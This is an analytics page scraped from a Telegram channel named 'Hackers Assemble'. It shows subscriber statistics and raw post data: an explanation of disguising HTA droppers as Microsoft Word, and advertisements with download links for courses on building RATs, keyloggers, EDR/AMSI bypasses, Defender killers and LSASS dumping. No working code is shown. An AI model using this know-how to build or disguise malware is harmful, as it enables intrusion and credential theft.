en
Feedback
π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜

π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜

Open in Telegram

All Stuff Shared Here is for educational purpose. We are not resposible for any activity of a user with the posts and content here.

Show more

πŸ“ˆ Analytical overview of Telegram channel π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜

Channel π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜ (@hackers_assemble) in the English language segment is an active participant. Currently, the community unites 15 233 subscribers, ranking 8 244 in the Technologies & Applications category and 2 456 in the USA region.

πŸ“Š Audience metrics and dynamics

Since its creation on Π½Π΅Π²Ρ–Π΄ΠΎΠΌΠΎ, the project has demonstrated rapid growth, gathering an audience of 15 233 subscribers.

According to the latest data from 06 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 77 over the last 30 days and by -1 over the last 24 hours, overall reach remains high.

  • Verification status: Not verified
  • Engagement rate (ER): The average audience engagement rate is 24.11%. Within the first 24 hours after publication, content typically collects 7.75% reactions from the total number of subscribers.
  • Post reach: On average, each post receives 0 views. Within the first day, a publication typically gains 1 180 views.
  • Reactions and interaction: The audience actively supports content: the average number of reactions per post is 0.
  • Thematic interests: Content is focused on key topics such as ksroski, pinkgateway, rat, exploit, ksroskis.

πŸ“ Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
β€œAll Stuff Shared Here is for educational purpose. We are not resposible for any activity of a user with the posts and content here.”

Thanks to the high frequency of updates (latest data received on 07 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

15 233
Subscribers
-124 hours
-197 days
+7730 days
Attracting Subscribers
September '26
September '26
+34
in 0 channels
August '26
+214
in 0 channels
Get PRO
July '26
+220
in 2 channels
Get PRO
June '26
+107
in 0 channels
Get PRO
May '26
+108
in 0 channels
Get PRO
April '26
+54
in 0 channels
Get PRO
March '26
+58
in 0 channels
Get PRO
February '26
+101
in 0 channels
Get PRO
January '26
+161
in 0 channels
Get PRO
December '25
+127
in 0 channels
Get PRO
November '25
+135
in 2 channels
Get PRO
October '25
+192
in 0 channels
Get PRO
September '25
+188
in 0 channels
Get PRO
August '25
+161
in 0 channels
Get PRO
July '25
+160
in 0 channels
Get PRO
June '25
+613
in 3 channels
Get PRO
May '25
+106
in 0 channels
Get PRO
April '25
+51
in 0 channels
Get PRO
March '25
+51
in 0 channels
Get PRO
February '25
+104
in 1 channels
Get PRO
January '25
+86
in 1 channels
Get PRO
December '24
+198
in 5 channels
Get PRO
November '24
+88
in 1 channels
Get PRO
October '24
+60
in 1 channels
Get PRO
September '24
+265
in 0 channels
Get PRO
August '24
+310
in 0 channels
Get PRO
July '24
+323
in 0 channels
Get PRO
June '24
+356
in 0 channels
Get PRO
May '24
+313
in 1 channels
Get PRO
April '24
+390
in 2 channels
Get PRO
March '24
+569
in 3 channels
Get PRO
February '24
+804
in 22 channels
Get PRO
January '24
+706
in 18 channels
Get PRO
December '23
+617
in 1 channels
Get PRO
November '23
+884
in 6 channels
Get PRO
October '23
+858
in 1 channels
Get PRO
September '23
+914
in 0 channels
Get PRO
August '23
+609
in 0 channels
Get PRO
July '23
+832
in 0 channels
Get PRO
June '23
+542
in 0 channels
Get PRO
May '23
+506
in 0 channels
Get PRO
April '23
+608
in 0 channels
Get PRO
March '23
+535
in 0 channels
Get PRO
February '23
+268
in 0 channels
Get PRO
January '23
+267
in 0 channels
Get PRO
December '22
+281
in 0 channels
Get PRO
November '22
+375
in 0 channels
Get PRO
October '22
+602
in 0 channels
Get PRO
September '22
+497
in 0 channels
Get PRO
August '22
+518
in 0 channels
Get PRO
July '22
+331
in 0 channels
Get PRO
June '22
+461
in 0 channels
Get PRO
May '22
+580
in 0 channels
Get PRO
April '22
+2 582
in 0 channels
Date
Subscriber Growth
Mentions
Channels
07 September+10
06 September+5
05 September+2
04 September+9
03 September+6
02 September+2
01 September0
\n\n\n\nThe HTA Application Object\n\nThe tag transforms this HTML file into a trusted Windows application:\n\nAPPLICATIONNAME \"Microsoft Word\" - Makes the process appear as \"Microsoft Word\" in task manager\n\nICON C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE - Uses the legitimate Word icon to appear authentic\n\nBORDER \"dialog\" - Creates a professional-looking dialog window\n\nSHOWINTASKBAR \"yes\" - Blends in with legitimate applications\n\nSINGLEINSTANCE \"yes\" Prevents duplicate windows that might raise suspision\n\nBy using the genuine Word icon, this HTA exploits the user's trust in the Microsoft Office ecosystem. Even a technically savvy user might overlook this if they glance at the taskbar.","datePublished":"2026-09-05T19:47:56Z","dateModified":"2026-09-05T19:47:56Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":467},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":24}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-05T14:14:21Z"}}},{"@type":"ListItem","position":6,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3167","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3167","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3167","headline":"The following table lists the members exposed by the HTA:APPLICATION object. APPLICATIONNAME β€” Sets or gets t…","articleBody":"The following table lists the members exposed by the HTA:APPLICATION object.\n\nAPPLICATIONNAME β€” Sets or gets the name of the HTML Application (HTA)\n\nBORDER β€” Sets or gets the type of window border for the HTML Application (HTA)\n\nBORDERSTYLE β€” Sets or gets the style set for the content border in the HTML Application (HTA) window\n\nCAPTION β€” Sets or gets a Boolean value that indicates whether the window is set to display a title bar or a caption, for the HTML Application (HTA).\n\ncommandLine β€” Gets the argument used to launch the HTML Application (HTA)\n\nCONTEXTMENU β€” Sets or gets a string value that indicates whether the context menu is displayed when the right mouse button is clicked\n\nICON β€” Sets or gets the name and location of the icon specified in the HTML Application (HTA)\n\nINNERBORDER β€” Sets or gets a string value that indicates whether the inside 3-D border is displayed\n\nMAXIMIZEBUTTON β€” Sets or gets a Boolean value that indicates whether a Maximize button is displayed in the title bar of the HTML Application (HTA) window\n\nMINIMIZEBUTTON β€” Sets or gets a Boolean value that indicates whether a Minimize button is displayed in the title bar of the HTML Application (HTA) window\n\nNAVIGABLE β€” Sets or gets a string value that indicates whether linked documents are loaded in the main HTML Application (HTA) window or in a new browser window.\n\nSCROLL β€” Sets or gets a string value that indicates whether the scroll bars are displayed.\n\nSCROLLFLAT β€” Sets or gets a string value that indicates whether the scroll bar is 3-D or flat\n\nSELECTION β€” Sets or gets a string value that indicates whether the content can be selected with the mouse or keyboard.\n\nSHOWINTASKBAR β€” Sets or gets a value that indicates whether the HTML Application (HTA) is displayed in the Windows taskbar\n\nSINGLEINSTANCE β€” Sets or gets a value that indicates whether only one instance of the specified HTML Application (HTA) can run at a time.\n\nSYSMENU β€” Sets or gets a Boolean value that indicates whether a system menu is displayed in the HTML Application (HTA).\n\nVERSION β€” Sets or gets the version number of the HTML Application (HTA).\n\nWINDOWSTATE β€” Sets or gets the initial size of the HTA window.\n\n\nSource: https://learn.microsoft.com/en-us/previous-versions/ms536495(v=vs.85)","datePublished":"2026-09-05T19:47:56Z","dateModified":"2026-09-05T19:47:56Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":489},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":13}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-05T14:11:01Z"}}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3166","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3166","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3166","headline":"πŸ‘Ώ HTA Droppers HTML Applications (HTAs) are a favorite tool for this exact kind of deception. Let's break dow…","articleBody":"πŸ‘Ώ HTA Droppers\n\nHTML Applications (HTAs) are a favorite tool for this exact kind of deception. Let's break down one such dropper to understand how it works from a malware analysis perspective.\n\nWhat is an HTA?\n\nAn HTA, or HTML Application, is a Windows program that uses the structure of a webpage (HTML) and the power of scripting languages like VBScript or JavaScript. You can think of it as a hybrid: it looks and acts like a standard Windows application but is built with web technologies. A key reason HTAs are valuable to malware authors is that they run with the same privileges as the user who opens them, bypassing many of the security restrictions typically applied to web scripts in a browser. The HTA is executed using theΒ mshta.exeΒ utility, which is a standard, trusted Windows file.\nThe core of an HTA is theΒ Β element. This special tag is what transforms a simpleΒ .htmlΒ file into a powerfulΒ .htaΒ application. It provides a set of attributes that control the application's window, appearance, and behavior","datePublished":"2026-09-05T19:47:55Z","dateModified":"2026-09-05T19:47:55Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":600},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":13}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-05T14:05:41Z"}}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3164","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3164","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3164","headline":"❀️ SHARE AND SUPPORT US❀️ πŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy","articleBody":"❀️ SHARE AND SUPPORT US❀️\n\nπŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy","datePublished":"2026-09-05T19:46:46Z","dateModified":"2026-09-05T19:47:01Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":2}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-03T20:35:47Z"}}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3162","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3162","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3162","headline":"❀️ SHARE AND SUPPORT US❀️ πŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy","articleBody":"❀️ SHARE AND SUPPORT US❀️\n\nπŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy","datePublished":"2026-09-05T14:32:52Z","dateModified":"2026-09-05T14:32:52Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":761},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":9},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":50}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-03T23:21:04Z"}}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3161","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3161","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3161","headline":"Building a Custom Remote Access Trojan (RAT) This course is all about getting hands-on with the the inner wor…","articleBody":"Building a Custom Remote Access Trojan (RAT)\n\nThis course is all about getting hands-on with the the inner workings of advanced malware, specifically Remote Access Trojans, or RATs. You’ll learn how they’re built, how they work behind the scenes, and how they avoid detection.\n\nWe’ll start with the basics: what makes up a RAT, how they’re structured, and examples from the real world. Then we’ll dive into building your own, step by step. You’ll implement features like process listing, file hiding, keylogging, and remote desktop stealing. You’ll also explore advanced evasion techniques like NTDLL unhooking, time stomping, and rootkit behavior.\n\nEach lesson mixes theory with code so you understand both the β€œwhy” and the β€œhow.” You’ll build working proof-of-concepts along the way and finish the course with a solid grasp of how real-world malware operates and how defenders can spot it.\n\nRequirements\n\n🟒C++\n🟒Basic Malware Knowndelge\n\nInfo : https://0x12darkdev.net/courses/building-a-custom-remote-access-trojan-rat/\n\nπŸ”— Download: https://t.me/c/3313734094/5071","datePublished":"2026-09-05T14:32:52Z","dateModified":"2026-09-05T14:32:52Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"image":["https://n2.tlmtr.cc/p/_A1BkBQ1385Ca35cpWzfZXjaYSPIHMHRLRg5qyvoAgh8?ty=l"],"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":739},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":39}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-03T23:04:18Z"}}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3156","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3156","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3156","headline":"❀️ SHARE AND SUPPORT US❀️ πŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy","articleBody":"❀️ SHARE AND SUPPORT US❀️\n\nπŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy","datePublished":"2026-09-05T14:32:48Z","dateModified":"2026-09-05T14:32:48Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":662},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":28}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-03T22:35:50Z"}}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3155","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3155","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3155","headline":"Windows Offensive Evasion Most evasion content out there teaches you to run a tool and hope it works. This co…","articleBody":"Windows Offensive Evasion\n\nMost evasion content out there teaches you to run a tool and hope it works. This course teaches you why the tool works, so when it stops working, you’re not stuck.\n\nWe start from the basics: how Windows actually loads and monitors your process, what EDRs are looking at, and why most detections happen. From there we go deeper module by module, userland hooking, AMSI and ETW bypasses, stealthy process injection, API obfuscation, userland and kernel rootkits, all the way down to kernelmode techniques like BYOVD exploitation\n\nEvery lesson follows the same idea: understand the mechanism first, then the technique, then how defenders actually catch it. No black boxes, no β€œjust run this script.”\n\nBuilt for red teamers, malware devs, and anyone who wants to stop copy-pasting PoCs and start understanding what’s happening under the hood\n\nRequirements\n\n🟒Comfortable with C or C++ (you’ll be reading and adapting code, not writing from scratch every time)\n🟒Basic understanding of the Windows API (processes, threads, handles)\n🟒Familiarity with assembly (x64) is helpful but not mandatory, it’s explained when needed\n🟒Basic Windows internals concepts (PEB, TEB, memory layout) are a plus but not required, since foundational modules cover this\n🟒A Windows VM for testing (isolated, not your host machine)\n🟒Visual Studio (Community edition is fine) or a comparable C/C++ toolchain\n🟒WinDbg or x64dbg for debugging exercises\n\nInfo: https://0x12darkdev.net/courses/windows-offensive-evasion/\n\nπŸ”— Download: https://t.me/c/3313734094/5065","datePublished":"2026-09-05T14:32:47Z","dateModified":"2026-09-05T14:32:47Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"image":["https://n1.tlmtr.cc/p/_7CgjzqCqyF6csXwZtc50Mj5BE1RiFdI-KVqssAwqJEA?ty=l"],"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":567},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":23}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-03T22:35:27Z"}}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3153","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3153","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3153","headline":"❀️ SHARE AND SUPPORT US❀️ πŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy","articleBody":"❀️ SHARE AND SUPPORT US❀️\n\nπŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy","datePublished":"2026-09-05T14:32:46Z","dateModified":"2026-09-05T14:32:46Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":558},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":28}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-03T20:35:47Z"}}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3152","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3152","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3152","headline":"Introduction Windows Malware Development This course teaches advanced Windows malware development in a clear…","articleBody":"Introduction Windows Malware Development\n\nThis course teaches advanced Windows malware development in a clear and practical way. You will learn how malware is created for Windows systems and how it works. It is useful for red teamers, malware developers, and anyone interested in cybersecurity. You will learn how to understand, build, and defend against malicious software. All examples and projects are written in C++.\n\nβ”œβ”€β”€ Introduction\nβ”œβ”€β”€ Theory\nβ”œβ”€β”€ Shellcode Generator\nβ”œβ”€β”€ Shellcode Execution\nβ”œβ”€β”€ Shellcode Encryption\nβ”œβ”€β”€ Process Injection\nβ”œβ”€β”€ DLL Injection\nβ”œβ”€β”€ Inter Process Communication\nβ”œβ”€β”€ Downloader\nβ”œβ”€β”€ Multiplatform\nβ”œβ”€β”€ Malware as Service\nβ”œβ”€β”€ Persistence\nβ”œβ”€β”€ Import Address Table & String Encryption\nβ”œβ”€β”€ Sandbox and Virtual Machines\nβ”œβ”€β”€ Anti Debugging\nβ”œβ”€β”€ Microsoft Signatures\nβ”œβ”€β”€ Reverse Shell\nβ”œβ”€β”€ Keylogger\nβ”œβ”€β”€ Windows Defender Killer\nβ”œβ”€β”€ Privilege Escalation\nβ”œβ”€β”€ API Hooking\nβ”œβ”€β”€ Parent PID Spoofing\nβ”œβ”€β”€ Process Token\nβ”œβ”€β”€ Dump Lsass.exe\nβ”œβ”€β”€ Malicious Office Documents\nβ”œβ”€β”€ Botnet Infrastructure\n└── Conclusions\n\nInfo: https://0x12darkdev.net/courses/introduction-malware-development/\n\nπŸ”—Download : https://t.me/c/3313734094/5062","datePublished":"2026-09-05T14:32:46Z","dateModified":"2026-09-05T14:32:46Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"image":["https://n1.tlmtr.cc/p/_kDLvkwdAPyEp4IYsAEKEmMmbuASYofqCruwvCt2pR78?ty=l"],"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":572},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":25}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-03T20:28:15Z"}}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3149","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3149","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3149","headline":"❀️ SHARE AND SUPPORT US❀️ πŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy","articleBody":"❀️ SHARE AND SUPPORT US❀️\n\nπŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy","datePublished":"2026-09-05T14:32:24Z","dateModified":"2026-09-05T14:32:24Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":583},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":36}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-03T17:34:43Z"}}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3148","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3148","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3148","headline":"πŸ‘¨β€πŸ’» Learning C++ for Malware Development This course teaches C++ basics for beginners. It starts from zero an…","articleBody":"πŸ‘¨β€πŸ’» Learning C++ for Malware Development\n\nThis course teaches C++ basics for beginners. It starts from zero and focuses on Windows tools. You’ll learn code structure, variables, loops, functions, pointers, files, objects, and more. Then, it covers Windows API like processes, memory, registry, services, and DLLs. All examples are safe and educational, no real malware. Perfect if you want to build system skills for security work later.\n\nWhat You’ll Learn:\n\nDive into C++ from the ground up, with hands-on coding exercises, mini-projects, and practical examples drawn from system-level programming. By the end, you’ll be confident in writing efficient C++ code, managing memory, interacting with the Windows API, and creating reusable DLLs, all while emphasizing best practices, debugging, and code modularity.\nFeatures\n\nπŸ”΅Beginner-Friendly Structure: Starts from absolute basics like variables, loops, and functions, assuming minimal prior programming knowledge.\nπŸ”΅Comprehensive C++ Coverage: Includes syntax, data types, control flow, pointers, arrays, strings, STL intro, file I/O, OOP (classes, polymorphism), enums, error handling, and debugging.\nπŸ”΅Windows-Specific Focus: Dives into Windows API for system programming, covering processes, threads, memory management, registry, services, environment variables, IPC (named pipes), hooks, notifications, and timers, all with ethical, non-malicious examples.\n\nβ”œβ”€β”€ Introduction and Setup\nβ”œβ”€β”€ C++ Fundamentals\nβ”œβ”€β”€ Advanced C++ & Windows API Fundamentals\n└── Creating and Using DLLs in C++\n\nhttps://0x12darkdev.net/courses/learning-c-for-malware-development/\n\nπŸ”— Download : https://t.me/c/3313734094/5057","datePublished":"2026-09-05T14:32:23Z","dateModified":"2026-09-05T14:32:23Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— 